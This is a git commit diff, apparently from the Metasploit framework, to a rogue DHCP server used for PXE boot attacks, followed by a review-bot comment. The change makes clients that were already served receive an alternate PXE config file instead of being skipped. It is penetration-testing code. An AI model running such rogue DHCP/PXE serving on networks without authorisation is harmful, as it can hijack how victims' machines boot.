
Fixes #5312 for pivoted PXE attacks.

git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650da
Matt Weeks 2011-08-25 02:07:35 +00:00
parent 7ce649587b
commit 3432cf5f69


@ -222,6 +222,9 @@ int DHCPserv::run(){
string pxeConfigFile("update2");
stringOptionCheck(&pxeConfigFile, "PXECONF");
string pxeAltConfigFile("update0");
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
string pxePathPrefix("");
//get DHCP parameters
unsigned int leaseTime = 600;
@ -336,10 +339,6 @@ int DHCPserv::run(){
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
pkt << DHCPOffer;
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
continue; //Already served; allowing normal boot
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
pkt << DHCPAck;
@ -360,7 +359,12 @@ int DHCPserv::run(){
pkt << dhcpoption(OpDns, iton(dnsServer));
string pxemagic(PXEMagic,4);
pkt << dhcpoption(OpPXEMagic, pxemagic);
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
else
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
if ( hostname.length() > 0 ){
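Review bot: The branch added in the third hunk keeps the old comment "Already served; allowing normal boot", but the code there no longer appears to skip the client with `continue`; it replies in both the Discover and Request paths and only swaps the config file name, so the comment should say that, e.g. `// already served: reply with PXEALTCONF instead of PXECONF`. The unbraced if/else with a trailing comment is easy to misread and could be collapsed to `const bool alreadyServed = serveOnce && served.count(clienthwaddr) > 0;` followed by `pkt << dhcpoption(OpPXEConfigFile, alreadyServed ? pxeAltConfigFile : pxeConfigFile);`. The first hunk introduces the `PXEALTCONF` option with the default `update0` and no comment saying what that file is expected to contain; a one-line comment next to `pxeAltConfigFile` would document it. `DHCPserv::run` starts and ends outside the visible hunks, so where `served` is populated cannot be checked from here.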